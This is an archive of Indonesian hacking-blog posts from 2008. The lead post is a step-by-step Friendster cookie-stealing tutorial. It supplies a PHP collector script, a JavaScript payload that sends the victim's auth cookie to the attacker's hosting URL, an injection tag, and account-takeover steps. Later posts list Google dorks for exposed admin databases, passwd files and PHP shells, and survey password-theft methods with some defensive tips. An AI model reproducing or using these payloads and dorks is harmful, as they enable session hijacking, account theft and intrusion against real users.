2. http://www.openwall.com/john/

3. http://securitysite.host.sk/jtr.html

Mencuri Cookies di Friendster

2008-12-22T02:23:00.000+07:00

Cookies jelaslah sangat krusial. Apalagi di situs Friendster. Buat yg gak tau cookie, lebih baik cari info di abang Google, atau tante Yahoo, atau juga di embah Crankle, om AstaVista, dll.

Begini saja singkatnya. Cookie adalah suatu penanda yang diberikan suatu web server ke komputer kita sebagai tanda bahwa kita pernah mengunjungi situs yang bersangkutan. Nah, di beberapa situs semacam Friendster, kita akan diberikan sebuah Cookie khusus jika kita Log In ke situsnya. Nah, selama kita belum Log Out atau cookie tersebut dihapus, maka komputer tersebut akan selalu menampilkan halaman member yang bersangkutan jika membuka situs Friendster. Lalu, bagaimana jika Cookie tersebut kita curi dari member yang sedang log in?

Inilah topik yang cukup menarik. Setelah beberapa hari yang lalu saya membahas tentang Hack Friendster, saya kembali mengulasnya. Kenapa disini saya membahas mencuri Cookie di Friendster, bukan Cookie Yahoo? Ada beberapa alasan :

1. Friendster adalah situs yang cukup populer (ugh.. retoris)

2. Cookies-nya Friendster kadaluarsanya bertahun-tahun

Nah, alasan keuda-lah yang sebenarnya sangat krusial. Kalau Yahoo!, Cookies-nya punya kadaluarsa 24 Jam. Kalau Friendster, kalau gak salah kadaluarsanya bisa sampai 2015 lebih.

Oke, mulai saja tutorialnya.

Syarat yang Di Perlukan:

1.Punya Browser Mozzilla Firefox Dengan Add-On Cookie Editor!!

Kalo Belom Punya Klik Di SINI

2.Webhosting Untuk Penyimpanan Cookies Dan Code!!

Example:

http://www.ripway.com/ atau http://www.ifastnet.com Dan LAin2!!

3.Punya Account FriendSter Tentunya!!

Langkah-Langkahnya adalah:

1.Buat File PHP dengan nama c.php, (bisa buat di notepad ajah, tapi save dengan SAVE AS TYPE-nya All Files dan simpan dengan nama c.php). Isinya :

$cookie = $_GET[’c'];

$id = $_GET[’ses’];

$ip = getenv (’REMOTE_ADDR’);

if(strstr($cookie, “mac”)){

$fl = fopen(’lastkukis.txt’, ‘r’);

$buftxt = fgets($fl);

fclose($fl);

if($cookie!=$buftxt)

{

$date=date(”dmy.g:ia”);

$fl = fopen(’logkukis.txt’, ‘a’);

fwrite($fl, “\n”.$ip.’;;’.$id.’;;’.$date.”\n”.$cookie.”\n”);

fclose($fl);

$fl = fopen(’lastkukis.txt’, ‘w’);

fwrite($fl, $cookie);

fclose($fl);

}

}

echo “history.back(-1)”;

?>

2.Buat File Dengan Nama super.js Yang Isinya:

if (pageViewerID!=””){

var c=fgetCookie(”friendster_auth”);

if (c!=””)setTimeout(”window.location.href=’http://URLWEBHOSTING/c.php?c=’+escape(c)+’&ses=’+escape(pageViewerFName)+’~’+pageViewerID+’~@’+pageOwnerID”, 8000);}

JANGAN LUPA GANTI YANG BERCETAK TEBAL DENGAN URL WEB ANDA YANG ADA FILE PHP-NYA YANG SUDAH DI-UPLOAD

3.Dan Langkah Terakhir adalah Letakkan

Code INI:

<script type=”text/javascript” src=”http://URLWEBHOSTING/super.js” ></script>

ATAU

Nah….Klo Udah Dapet!!

Kamu Buka Link Ini:

ENCODER

Nah Setelah Itu Buka Cookie Editor Di Mozilla Dengan Cara:

Tools >>> Cookie Editor>>> ADD!!

ISI Dari Kolom Kosong Tersebut:

Name : friendster_auth

Content : hasil Encoder

Host : www.friendster.com

Path : /

EXPIRES: NEW EXPIRATION DATE

TAMBAHKAN NILAI TAHUN SAJA Dari 2007 Menjadi 2009 Atau 2015

Setelah Itu SAVE Dan Refresh friendSter-Nya

Semoga bermanfaat, teknik ini juga bisa diimplementasikan pada Media Box…..

Cara Menghapus Password MMC (MultiMedia Memory Card)

2008-12-22T02:22:00.000+07:00

Ada seseorang yang menanyakan kepada saya via email Bagaimana Cara Menghapus Password MMC (Multi Media Card) di handphonenya karena lupa passwordnya dan MMC tidak bisa diakses atau dihapus passwordnya. Agak menggelikan karena kenapa tidak menanyakannya kepada pakar handphone atau MMC saja. Mungkin karena beberapa postingan saya terdahulu menyangkut password dan removable drive/media seperti halnya MMC.

Oke, Mohon Maaf bila saya tidak menjawab melalui email, namun saya post ke Blog saya ini saja, sekalian sebagai informasi bagi siapa saja yang membutuhkannya via internet. Kebetulan beberapa tahun yang lalu (lupa kapan) saya dapat informasi cara penghapusan password pada MMC dari seorang Rekan saya di Solo yang gemar utak-atik Handphone.

Bila Anda menjumpai MMC Anda hanya terbaca oleh handphone Anda, tapi tidak bisa dibaca menggunakan handphone lain atau bahkan Card Reader karena proteksi password, ikuti langkah-langkah berikut:

1. Dari handphone Anda, browse file dengan masuk ke Explorer (bila tidak ada internal explorer, install third party explorer).
2. Buka C/system, dan cari file yang bernama: “MMCSTORE”,
3. Copy file “MMCSTORE” tersebut ke Komputer dengan teknik “Send To” (PC),
4. Buka File “MMCSTORE” yang telah Anda copy dengan Text Editor misal: Windows Notepad,
5. Lihat pada bagian akhir teks dari file “MMCSTORE” di dalam Notepad window; Itulah Password MMC Anda,
6. Terakhir, Buka MMC apps remove password dengan dengan Password yang telah Anda temukan tersebut.

Catatan:
Teknik ini mungkin saja tidak berlaku pada semua jenis MMC atau Handphone yang dikarenakan makin beragamnya jenis Mobile Device dan Teknis Operasional Mobile Device beserta Operating System di dalamnya, serta Pen-gupdate-an Operating System dan Teknis-Teknis Operasional oleh Vendor Mobile Device Operating System.

Google Hacking Lanjutan

2008-12-22T02:21:00.000+07:00

Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada
Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan
defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari
ribuan website tampilan utamanya berubah.

Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik
dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan
keyword yang sering digunakan untuk melakukan pencarian file dan juga
bagaimana mencari target dengan memanfaatkan Google.

— Penggunaan Dasar ———————————————–

- Google tidak “case sensitive”.
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama

- AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata “menjadi” dan “hacker”

- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR c**c*er
Hasilnya pencarian akan mengandung kata “hacker” atau “c**c*er”

- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
“how” dan “where”. Jika kata-kata umum ini begitu penting, anda
bisa menambahkan “+” didepan keyword tersebut.
Keyword: hacker how ==> Kata “how” akan diabaikan
Keyword: hacker +how ==> Kata “how” akan diikutsertakan

- -: Tanda minus “-” bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
“linus tanpa linux”, kita bisa menggunakan “linus -linux”

- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja*
Google tidak mencari kata “menjamu”, “menjadi”, “menjalar”, dll
Google akan menghasilkan pencarian hanya yang mengandung kata
“menja”.

Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: “menjadi * hacker”
Hasilnya pencarian dapat menghasilkan “menjadi seorang hacker”,
“menjadi white hacker”, dll.

- “”: Dapat digunakan untuk mencari kata yg lengkap.
Keyword: “menjadi hacker”
Hasilnya pencarian akan mengandung kata “menjadi hacker”

- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3

— Operator Spesial ———————————————–

– Contoh hasil pencarian –

Google –> Judul
… Language Tools. Ways to help with tsunami relief \
Advertising Programs - About Google ©2005 Google - > Deskripsi
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 –> URL

– Contoh hasil pencarian –

- intitle: Untuk mencari kata-kata dari judul suatu halaman web.
Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman “Admin” dengan
deskripsi “Administrasi”

- allintitle: Untuk mencari kata-kata dari judul halaman web
secara lengkap.
Keyword: allintitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman yang mengandung
kata “Admin” dan “Administrasi”

- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata “Admin”
dengan deskripsi “Administrasi”

- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata “Admin”
dan “Administrasi”

- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site “echo.or.id”

- cache: Ketika Googlebot mengindeks suatu situs, google akan
mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah
dicache.
Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya
pada snapshot/cache yang disimpan oleh Google.

- define: Operator ini digunakan untuk mencari definisi dari frasa
tertentu. Semua kata yang diketik setelah operator ini akan
diperlakukan sebagai satu frasa.
Keyword: define:hacker

- filetype: Jika kita mencari jenis file tertentu yang berisi informasi
yang anda inginkan kita bisa menggunakan operator ini.
Keyword: “hacker” filetype:pdf
Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html

- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa
menggunakan operator link.
Keyword: link:www.google.com

- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.
Keyword: related:www.google.com

— Manipulasi URL Google ——————————————

> And bisa mengganti interface google dengan mengganti variabel hl
(default google hl=en => bahasa inggris)
Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Aboleh-hacking.com&btnG=Search

> Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini
dilakukan dengan modifikasi variabel lr.
(default google lr=lang_en => bahasa inggris)
Misalkan kita hasil pencarian hanya bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=lang_id&q=site%3Aboleh-hacking.com&btnG=Search

> Secara default google akan menampilkan 10 site perhalaman. Anda dapat
mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel
num pada URL :D
Penggunaan num antara 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?num=100&hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search

> as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini
digunakan menentukan hasil berdasarkan bulan. x antara 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aboleh-hacking.com&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Aboleh-hacking.com&btnG=Search

> safe=off: arti dari variabel ini filter “SafeSearch” dimatikan. “SafeSearch”
untuk memfilter hasil pencarian sexual.

Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer
sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih
dahulu (kecuali anda menggunakan brwoser yang support google secara built-in
atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat
bandwidth ke luar negeri :D
Karena bandwidth di Indonesia mahal ……..

Contoh script google.html lengkap dengan varabielnya.

— BOF google.html —

— EOF google.html —

Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau
menambahkan apapun disana. Semuanya terserah kepada anda :D
Berikut merupakan script default pencarian google.

— BOF google.html —

— EOF google.html —

Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com

— Tips & Tricks ————————————————–

Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan
operator-operator tersebut.

Ex:
- Keyword: site:boleh-hacking.com, menghasilkan semua site echo.or.id. Kemudian
anda bisa mencoba keyword: site:boleh-hacking.com hacker, akan menghasilkan
semua site boleh-hacking.com yang mengandung kata hacker.

Kita juga dapat melakukan pencarian secara spesifik melalui google.
Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education

Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

intitle:index of intitle:mp3 -html -htm name size
intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size
intitle:index of intitle:cgi-bin password -html -htm name size

inurl:”admin.mdb” -html
inurl:”password.mdb” -html
inurl:”data.mdb” -html
“phpMyAdmin” “running on” inurl:”main.php”
intitle:”PHP Shell” “Enable stderr” php

Pencurian password

2008-12-22T02:20:00.000+07:00

Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi
di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para
newbie yang terus saja bertanya-tanya.. “Bagaimana cara mendapatkan password
email orang lain?” atau pertanyaan yang paling sering saya terima ialah..
“Bagaimana cara anda mendapatkan password saya?” :P
Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah
wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga
account saat berada di tempat-tempat rawan.
0 [0XFFF0000] Bagaimana Mendapatkannya?
Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak
membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan
paling sering digunakan:
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling
[1]. Social Engineering
Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan
memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai
“penipuan” :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar
sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran
seperti sang korban.
Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu
sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang
dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang
biasa dilakukan sang korban.
Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang
memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan,
dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering
dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali
sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan
kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan
membuat ( seolah - olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan
demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan
tanpa merasa curiga.
Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak
ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai
karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga
suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu
sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan
manusia. ehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker
melalui social engineering, maka bisa jadi anda sendirilah yang membukakan
jalan masuk bagi sang attacker.
# Contoh Social Engineering sederhana:
Baca Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]
[2]. KeyLogger
KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu
biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan
keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form
password misalnya.
Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan
keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang
keyloger) tidak akan mendapatkan password anda yang sebenarnya.
2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin
memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password
anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa?
karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat
ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam
clipboard.
[3]. Web Spoofing
Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah
satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan
memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar.
Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia
sedang mengakses suatu situs tertentu, padahal bukan.
Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan
situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu
mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal,
karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi
terekam oleh webserver palsu, yaitu milik sang pelaku.
[4]. Menghadang Email
Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu
cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff.
Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di
Internet dan menyusunnya menjadi suatu email utuh.
Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara
dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data.
Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump,
sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa
paket-paket data ini dan menampilkan password (dsniff) atau isi email
(mailsnarf).
Baca artikel terkait pada arsip lama :)
[5]. Password Cracking
“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang
yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu
yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari -
hari! Semua itu tergantung dari target, apakah sang target menggunakan
password yang umum, password memiliki panjang karakter yang tidak biasa, atau
password memiliki kombinasi dengan karakter-karakter special.
Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan
mengunakan Brutus, salah satu jenis software remote password cracker yang
cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau
bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.
Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus
password. Sedangkan brute - force attack bekerja dengan mencobakan semua
kombinasi huruf, angka, atau karakter.
Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama
tergantung dari jenis spesifikasi komputernya dan panjang karakter
passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses
terhadap usaha login yang secara terus-menerus tidak berhasil.
Jika anda ingin melakukan password Cracking, silahkan pilih - pilih sendiri
aplikasinya di halaman Member - spyrozone.tk.
[6]. Session Hjacking
Session hijacking dewasa ini semakin marak dikalangan para attacker. Session
Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada
intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi
loginnya.
Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa
dengan mudah membuat semacam script Java Script yang disisipkan dalam email
untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya
akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script
PHP.
Belakangan ini yang paling sering menjadi incaran adalah account Friendster.
Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di
profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya
memiliki tips untuk ini:
1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang
lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari
account anda dan bersihkan semua cookies, baru kemudian bukalah profil
Friendster tujuan.
2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah
disana terdapat script asing atau kata-kata yang identik dengan pembajakan
seperti : “HACKED”, “DEFACED”, “OWNED”.. dll.. Jika ragu-ragu……. reject
ajah..
3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan
sendirinya dari account anda. Saat anda diminta memasukkan username dan
password, lihat dulu addressbar anda! apakan anda sedang berada di situs
yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada
form action, kemana informasi anda nantinya akan dikirim.
Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan
memperhatikan hal-hal berikut:
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.
Fenomena lain adalah,hingga saat artikel ini diterbitkan,ternyata masih banyak
dijumpai para user yang tidak melakukan sign out setelah membuka accountnya.
Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website
yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke
account sang korban.
[7]. Menjadi Proxy Server
Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban
untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang
peselancar bisa menjadi milik kita.
[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser
Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan
kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya
cache dan Password Manager.
Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam
beberapa hari (Contohnya spyrozone.tk nich.. hehehe ;) Nah, untuk situs yang
seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan
file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs
tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari
server sehingga setiap halaman situs yang telah anda buka sebelumnya akan
terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to
live.
Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date?
Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya
anda akan terus melakukan download setiap kali berkunjung.
Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi
opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa
menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary
yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut
akan disimpan.
Coba anda buka folder tersebut, anda akan menemui file-file html & file-file
gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa
melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options
—> Settings
Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang
coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah
salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs
apa saja yang telah diakses oleh oleh orang sebelum anda.
Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password
dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya
pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.
Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password.
Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak
dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan
atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi
YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca:
tidak mau tau) apa maksud dari kotak dialog itu.
Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah
mendapatkan password korban dengan memasuki menu Tools —> Options —>
Security –> Saved password.
Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera.
Saat anda memasukkan user name dan password pada suatu form dan menekan
tombol submit, opera secara default akan meminta konfirmasi kepada anda
apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan
lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”.
Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat
situs apa saja yang telah diakses oleh user, arahkan browser ke situs
tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan
BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis
terisi dengan user name korban lengkap dengan passwordnya ;D (It’s fun
enough.. ;)
Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!
[9]. Googling
Google.com. Banyak sudah situs yang runtuh, password dan nomor - nomor kartu
kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;)
Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu
yang berkaitan dengan user name dan password, anda bisa memanen ratusan
password user melalui google. Tapi sekarang tampaknya anda harus gigit jari
jika menggunakan cara diatas ;D
Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu
Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat
meng-crawl hingga kepada archive file yang berada di public directory web
server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di
dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang
kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar
situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang
yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif
dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman
bermain” anda akan diambil alih olehnya..
0 [0XFFFF000] Penutup
Wew… ada banyak cara bukan untuk mendapatkan account orang lain?? So, selalu
berhati-hatilah. Waspada selalu saat berada di tempat umum, bahkan saat berada
di komputer pribadi anda sekalipun karena bisa jadi teman anda atau siapapun
yang meminjam komputer anda memiliki tujuan yang kurang baik.
Sekian, semoga bermanfaat dan bisa menambah pengetahuan anda .

Tips Trik Registry / Regedit Windows (Gratis)

2008-12-22T02:17:00.000+07:00

Pendahuluan

1. PengertianRegistry / Regedit
Registry adalah informasi database yang berada pada sistem operasi
Microsoft Windows 95 keatas. Database ini menyimpan pengaturan yang kita
lakukan pada komputer. Setipa kali program dimulai dan setiap kali Windows
melakukan suatu operasi, registry akan mengisinya dengan variabel yang
mengatur system komputer.

2.Dimana Registry disimpan ?
System.Dat
Pada saat kita melakukan penghidupan komputer ( Booting ), windows pertama
kali akan mencari dan mengakases file System.dat, sebelum menyentuh bagian
bagian lain dari registry. System.dat akan menyimpan data-data khusus yang
berhubungan dengan system komputer yang kita pakai. Oleh karena itu, suatu
file system.dat pada komputer sifatnya adalah unik dan spesifik. Kita tidak
dapat memindahkan file ini ke suatu system komputer lainnya. jika hal itu
kita lakukan akan menjadi kemacetan sistem operasi windows.

User.Dat

Windows akan membaca file User.dat sesudah membaca file system.dat
Berbeda dengan system.data yang hanya terdapat satu file saja, file user.dat
ini akan mempunyai beberapa file dengan nama dan kemampuan yang sama.
Jumlah User.dat bergantung pada jumlah pemakai yang logon ke sistem komputer.
Sebagai contoh, seorang pemakai yang bernama ndaru memakai atau log on
ke system komputer. Pada saat kotak dialog log on, maka windows akan membuat
suatu data tentang user yang bernama ndaru tersebut.
File user.dat berisi informasi pemakai yang spesifik, seperti pasword dan preferensi
aplikasi individual. File user.dat yang berada pada direktory profil
akan diload setelah file user.dat yang ada diserektori windows. jika terjadi
konflik antara dua file ini, informasi yangmengalami konflik pada user.dat
profile yang kan dipakai.
User.dat utama(Default) yang berada pada direktory windows, akan berisi
informasi konfigurasi system, seperti Control panel,setting aplikasi,
pengelompokan menu pada start menu, file-file Desktop, dan sebagainya.
User.dat yang berada pada direktory profil berisi informasi yang sebagian
besar sama dan akan dipakai sebagai informasi yang memiliki hak yang lebih
tinggi dari pada user.dat yang berada di direktory Windows.
Pada saat windows di matikan ( Shut down ), secara otomatis ia akan
membuat suatu salinan dari file system.dat dan user.dat di direktory windows.
Sedangkan user.dat yang lain juga akan membuat cadangannya.
Salinan dari file system.dat adalah system.da0 sedang untuk user.dat
adalah User.da0. Kedua file salinan ini akan amat berguna untuk proses
pemulihan jika terjadi kerewelan pada windows.

Pengamanan Pelaksanaan dalam Melakukan Modifikasi

1. Copykan File User.dat, System.dat, Regedit.exe,Explorer.exe, Explorer.ncf ke
Direktory lain atau dalam Disket. File tersebut berada di bawah direktory
/Window/. Simpan File copian tersebut ketempat yang diangap aman.
2. Laksanakan Prosedure yang terlampir untuk melakukan perubahan registry
Jika ingin melakukan penormalan kembali terhadap registry, kita dapat mendisablekan
terhadap setiap modifikasi dengan menganti nilai Default ( nilai Terlampir )

Cara Penormalan Kembali Registry

Clik Icon MyKomputer dan tekan tombol ->Del c:\windows cari
file Explorer.exe dan clik dua kali icon tersebut. Selajutkan jalankan
regedit dan disablekan terhadap perubahan yang kita lakukan, atau jalankan
